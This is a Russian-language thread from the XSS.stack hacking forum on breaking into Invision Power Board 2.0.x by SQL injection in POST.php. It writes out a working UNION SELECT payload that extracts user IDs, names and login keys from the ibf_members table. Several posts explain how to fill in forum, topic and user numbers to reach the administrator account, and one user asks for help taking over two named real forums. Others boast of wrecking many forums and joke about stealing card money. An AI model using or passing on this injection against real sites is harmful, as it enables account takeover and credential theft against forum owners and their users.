• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом Invision Power Board

c31337

(L3) cache
Пользователь
Регистрация
31.12.2004
Сообщения
156
Реакции
2
Вчера(в новогоднюю ночь) Мы с winux'ом разговаривали на тему защищенности IPB(Invision Power Board). Основным аргументом в пользу защищенности был такой: "IPB-считается самым защищенным форумом в сети". Но мои ночные путешествия по интернету доказали обратное. Я случайно набрел на старый баг SQL Ijection В IPB. Решил тут же протестить баг на новой версии форума. Долго искать не стал, и так как у меня была открыта страница http://www.winux.net.ru/forum/ то ей не повезло :) Спервого раза нихрена не получилось. Но после долгих ######аний я пришел к запросу к базе вида:
http://www.winux.net.ru/forum/index.php?&&...s%20WHERE%20id=1%20/*
Таким образом через SQL Ijection в скрипте POST.php Я получил окошко с какойто херней и в низу было написано
1:Login:h5g66h7t6h76j7h6j7
Логин - это имя пользователя под номером 1
о7ген89о7но78ео7е8н-это захешированный пароль в алгоритме md5
Мне оставалось лишь расшифровать пароль при помощи тулзы md5hashinside и войти под логином и паролем Администратора.
Но на этом я прекратил свой взлом.
Кстати даже не пытайтесь проверить багу на этом форуме(т.к. мы с winux-ом ее залепили)
В инете еще куча таких форумов.
Все пароли выдуманы
PS:Самая защищенная система-это забетонированная гиря(без ручки)
=========================================
Чтобы залатать уязвимость надо скачать файл source.zip и заменить Его содержимым скрипт POST.php
+++++++++++++++++++++++++++++++++++++++++
Article by c31337
 
Все, форум действительно заляпали. Будем продолжать работу в этой области...
Я, если честно, думал что IPB самая защищенная система форумав. Вообщем баг крученый был.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я тут нашёл пару форумов,которые такие же как и этот.
Скажите как поиметь админские права,так как тут написано вроде не получается...
http://hostel.tusur.ru/phorum/
http://www.arirang.ru/forums/
Вот форумы...
 
не знаю, у меня не пашет эта фича, пробовал почти на всех IPB (от 1.2, 1.3 до последних версий 2.....), на большинстве выдает такую ошибку

Обнаружена ошибка:
Некоторые требуемые файлы отсутствуют. Если Вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова

Не знаю в чем проблема, врядли все ж залатали этот баг
может с ошибкой кинули сам тег....
 
Ну вы блин даете. Я херею просто. Ошибка выскакивает при неверном указании топика и(или форума).
В общем запрос должен быть такого вида:
forum/index.php?&act=Post&CODE=02&f=НОМЕР ФОРУМА&t=НОМЕР ТОПИКА&qpid=1)%20union%20select%201,1,1,1,1,1,1,1,
1,1,CONCAT(id,char(58),name,char(58),member_
login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_me
mbers%20WHERE%20id=НОМЕР ПОЛЬЗОВАТЕЛЯ%20/*
Если вы что-то неправильно указали, то вылезает эта ошибка(мол топик-то не найден такой)
=======================================
Бага работает под версиями 2.0.2 2.0.1(неточно) 2.0.0(неточно)
=======================================
И не забывайте большинство более или менее крупных порталов залатались. А в некоторых форумах(редко но бывает) колонка базы может отличаться.
 
Правильно. Я тоже.:) Только я ломаю нетмаг, потом трачу все деньги с кред и ухожу в неизвестность.:):):):)
 
Попробовал я, только одно НО ...

после такого запроса он выводит меня на страницу где писать ответ на форуме и уже с готовым чьим то текстом из базы.

блин .. сам не понял что написал.

Вообще меня кидает на тему которую я указал в строке и в поле текста уже чье то сообщение совсем с другой темы.
 
Так я такого не вижу

Таким образом через SQL Ijection в скрипте POST.php Я получил окошко с какойто херней и в низу было написано
1:Login:h5g66h7t6h76j7h6j7
Логин - это имя пользователя под номером 1
о7ген89о7но78ео7е8н-это захешированный пароль в алгоритме md5
 
Я наверное что-то не так объяснил или понял!

Например:

Захожу на я форум один ...
нашел любую тему там ...

Узнал что номер темы например 100 а номер форума 2 и сделал такой запрос

index.php?&&act=Post&CODE=02&f=2&t=100&qpid=1)%20union%20select%%20201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1<br%20/>,1,1,1,1,1%20from%20ibf_members%20WHERE%20id=1%20/*

и поставил юзера 1, админа.

и после чего меня перекинуло вот куда

Скриншот

это получается что меня перекинуло в ту тему которую я указал, только текст ответа уже был взят с базы и с совсем другой темы.

Вот ... и нечего там даже расшифровывать.

Может я что-то не понял, не отрицаю.
 
лол.
я это sql запрос юзал когда вы еще пеленки пачкали.
и кучу форумов убил, и незаморачивался с расшифровыванием MD5.
Еще подделовал вплотуную sql запрос сессии на доступ в админцентр. (этого нет в паблике ;))
 
Еще подделовал вплотуную sql запрос сессии на доступ в админцентр. (этого нет в паблике ;))
Да. Ну ты крут :) :) . Я конечно ничего не имею против тебя, но мне кажется, что любой скрипткидис может подставить SQL запрос. Слушай, а не легче создать HTTP запрос например GET...
=====================================
Скриншот посмотрел: Форум пропатчен. Вы бы еще вспомнили про эту багу лет через десять. Щас только 1 из 10 форумов уязвимы. Отлично эксплуатируется непропатченая версия этого форума(триал).
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх